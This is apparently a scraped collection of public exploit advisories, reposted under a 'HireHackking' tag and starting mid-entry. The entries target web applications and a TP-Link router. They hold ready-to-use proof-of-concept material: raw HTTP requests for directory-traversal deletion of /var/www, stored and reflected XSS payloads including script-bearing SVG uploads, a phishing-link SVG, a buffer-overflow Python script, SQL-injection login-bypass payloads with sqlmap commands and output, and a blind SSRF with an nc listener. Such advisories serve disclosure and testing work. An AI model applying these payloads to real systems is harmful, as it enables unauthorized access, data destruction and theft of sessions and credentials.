http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit
HireHackking 
Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
=======================================

arbitary directory deleting

GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
HireHackking 
# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
# Date: 29/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Release Notes:

Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.



## Stored XSS

-----------------------------------------------
POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1

promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
-----------------------------------------------

POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking]
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"


7. Accept with terms & Press [Booking]
   XSS Fired on Local User Browser

8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
   XSS Will Fire and Executed on his Browser

9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
   XSS Will Fire and Executed on his Browser

10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)
   XSS Will Fire and Executed on his Browser


[-] Done
HireHackking 
## Exploit Title: spip v4.1.10 - Spoofing Admin account 
## Author: nu11secur1ty
## Date: 06.29.2023
## Vendor: https://www.spip.net/en_rubrique25.html
## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/

## Description:
The malicious user can upload a malicious SVG file which file is not
filtered by a security function, and he can trick
the administrator of this system to check his logo by clicking on him
and visiting, maybe a very dangerous URL.
Wrong web app website logic, and not well sanitizing upload function.

STATUS: HIGH- Vulnerability

[+]Exploit:
```SVG
   <svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
     <defs>
       <linearGradient id="badgeGradient">
         <stop offset="0"/>
         <stop offset="1"/>
       </linearGradient>
     </defs>

     <g id="heading">
       <a xlink:href= "https://rb.gy/74f0y">
         <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
29.9,22.3 29.6,22.8 z"/>
         <!--<text id="label" x="5" y="20" transform = "rotate(-15 10
10)">New</text>-->
         <text id="title" x="40" y="20">Please click on the logo, to
see our design services, on our website, thank you!</text>
       </a>
     </g>

   </svg>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)

## Time spend:
00:37:00
HireHackking 
# Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/vacation-rental-website.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Stored XSS

------------------------------------------------------------
POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1

property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
------------------------------------------------------------

POST parameter 'username' is vulnerable to XSS
POST parameter 'title' is vulnerable to XSS
POST parameter 'comment' is vulnerable to XSS

## Steps to Reproduce:

1. Surf (as Guest) - Go to any Listed Property
2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
3. Inject your [XSS Payload] in "Username"
4. Inject your [XSS Payload] in "Title"
5. Inject your [XSS Payload] in "Comment"
6. Submit
7. XSS Fired on Local Browser
8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]
Note: I think Administration Panel missing a section to Manage [Reviews] on the website
this feature must be added in next Updates [View/Edit/Delete]
HireHackking 
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')
HireHackking 
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali linux

---------------------------------------


The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise 
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
leading to an unauthenticated SQL injection

--------------------------------------

How to Reproduce this Vulnerability:

1. Install WP AutoComplete <= 1.0.4 
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
3. Find requests belong to WP AutoComplete like step 5
4. Start sqlmap and exploit 
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
HireHackking 
# Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)
# Date: 30/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/gz-forum-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Release Notes:

Reflected XSS:

The attacker can send to victim a link containing a malicious URL in an email or
instant message can perform a wide variety of actions, such as stealing the victim's
session token or login credentials

Stored XSS
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.

## Reflected XSS
Path: /preview.php

GET 'catid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a


Path: /preview.php

GET 'topicid' parameter is vulnerable to RXSS

http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2

## Stored XSS
-----------------------------------------------
POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1

-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="free_name"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325
Content-Disposition: form-data; name="topic_message"

<script>alert(1)</script>
-----------------------------39829578812616571248381709325--

-----------------------------------------------

POST parameter 'free_name' is vulnerable to XSS
POST parameter 'topic' is vulnerable to XSS
POST parameter 'topic_message' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic)
2. Inject your [XSS Payload] in "Name"
3. Inject your [XSS Payload] in "Topic Title "
4. Inject your [XSS Payload] in "Topic Message"
5. Submit

4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on

5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)
6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
HireHackking 
Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
Application: prestashop
Version: 8.0.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 30.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
steps: 

1. Go to Catalog => Products 
2. Select arbitary product 
2. upload malicious svg file

svg file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>


poc request:

POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
Host: localhost
Content-Length: 756
sec-ch-ua: 
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Accept: application/json
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
Connection: close

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="path_thumb"


------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
Content-Disposition: form-data; name="file"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
HireHackking 
#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs:  Blind SSRF via XML Injection
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 01-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'

payload:  test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test

By the way i used localhost.If you have domain, you can use domain.

3.And upload episodes

4. I am listening on port 3132 because I'm observating for incoming requests

nc -lvp 3132

5. And I receive request

request:

POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 101563
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
Connection: close

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
Content-Type: image/jpeg

image content blaaahblahasdfjblaaah;sdfblaaahasdf
asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="title"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="shortdesc"

test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="date"

2023-07-01
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="time"

17:02
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="longdesc"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodenum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="seasonnum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="itunesKeywords"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authorname"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authoremail"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="customtags"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="token"

vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
------WebKitFormBoundarypRUTcUa48pmEcI6Q--
HireHackking 
# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
# Date: 1/07/2023
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: v15.0


POC:

1 ) Login in demo page , go to this url
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!
2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload
<img src=. onerror=alert(document.domain)>
3 ) You will be see alert box

POC:

1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>
https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!
2 ) You will be see alert box , stored xss 

POC:

1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file
after save it 

svg file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

2 ) When click this svg file you will be see alert button
HireHackking 
# Exploit Title: Beauty Salon Management System v1.0 - SQLi
# Date of found: 04/07/2023
# Exploit Author: Fatih Nacar
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
# CWE: CWE-89

Vulnerability Description -

Beauty Salon Management System: V1.0, developed by Campcodes, has been
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
allows an attacker to manipulate login authentication with the SQL queries
and bypass authentication. The system fails to properly validate
user-supplied input in the username and password fields during the login
process, enabling an attacker to inject malicious SQL code. By exploiting
this vulnerability, an attacker can bypass authentication and gain
unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection
vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL:
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php

2. In the username and password fields, insert the following SQL Injection
payload shown inside brackets to bypass authentication for usename
parameter:

{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In}

3.Execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized
access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 793
HTTP(s) requests:

---

Parameter: username (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
rvYF&password=test&login=Sign In

---

[15:58:56] [INFO] the back-end DBMS is MySQL

web application technology: PHP 8.2.4, Apache 2.4.56

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)